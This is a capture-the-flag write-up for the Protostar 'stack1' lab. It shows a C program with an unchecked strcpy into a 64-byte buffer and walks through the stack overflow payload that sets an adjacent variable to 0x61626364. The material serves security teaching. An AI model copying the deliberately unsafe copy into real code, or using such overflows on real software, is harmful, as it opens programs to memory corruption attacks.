Problem 
This level looks at the concept of modifying variables to specific values in the program, and how the variables are laid out in memory.
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
if(argc == 1) {
errx(1, "please specify an argument\n");
}
modified = 0;
strcpy(buffer, argv[1]);
if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
Hint 
If you are unfamiliar with the hexadecimal being displayed, “man ascii” is your friend.
Protostar is little endian
Solution 
We already know that we can overwrite the value of modified by filling up buffer[64], so by looking at the source, it shows that we have to change the value of modified into 0x61626364. Referring to the 1st hint, we look at man ascii to find this
Oct Dec Hex Char
──────────────────────
...
141 97 61 a
142 98 62 b
143 99 63 c
144 100 64 d
...
Now we know that we need to overwrite modified with those chars, regarding the 2nd hint, being little endian means that 0x61626364 translates into dcba, not abcd, so we have to “invert” our payload. So the final payload is 64 chars concatenated with dcba, and since we need to put our payload in argv[1], we do this:
user@protostar:/opt/protostar/bin$ python -c "print 'a'*64"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
user@protostar:/opt/protostar/bin$ ./stack1 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadcba
you have correctly got the variable to the right value
| ‹ Previous in Binary exploitation: Protostar - stack0 | Next in Binary exploitation: Protostar - stack2 › |